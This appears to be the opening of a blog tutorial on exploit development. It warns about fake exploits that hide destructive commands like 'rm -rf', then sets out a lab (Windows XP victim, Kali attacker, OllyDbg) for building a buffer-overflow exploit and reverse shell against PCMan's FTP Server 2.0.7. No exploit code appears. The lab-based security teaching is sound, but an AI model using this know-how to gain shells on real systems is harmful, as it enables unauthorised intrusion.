There are thousands of exploits out in the wild, even more being traded privately or held back as 0 days. Clearly we want to get access to as many of these resources as we can to maximize the chance of successful exploitation. A warning must be given to anyone downloading exploits. There are several fake exploits out there specifically designed to harm or destroy your computer. Never download exploits from a source and run them without first checking what they do and what commands they will be executing on your system. It’s highly recommended that you decode any encoded values to find what they actually mean. For example this exploit when decoded runs the “rm -rf” command on your system. Saying that, some of the resources outlined here such as exploit-db and security focus can be considered pretty trustworthy.
This post will detail how to find a simple buffer overflow, gather the information you need to successfully exploit it and how to eventually get a reverse shell against someone running this program. There are ton’s of exploits that be used for an example, but this post will highlight PCMan’s FTP Server 2.0.7, simply because it was one of the first ones I found on exploit-db and it was relatively simple.
The following is the ideal requirements for following the guide. If you cannot or don’t wish to use identical software or versions that’s fine, but I can’t guarantee that you won’t need to make modifications to get a proof of concept working.
- Windows XP – SP3 Virtual Machine (Victim).
- Kali Linux Virtual Machine (Attacker).
- OllyDbg v1.10 on Windows XP (Available here).
- PCMan’s FTP Server 2.0.7 (Available here under ‘vulnerable application’ link at the top of the page).
- A very basic understanding of x86 Assembly.
- A very basic understanding of Python.
- Be interested enough to learn and experiment.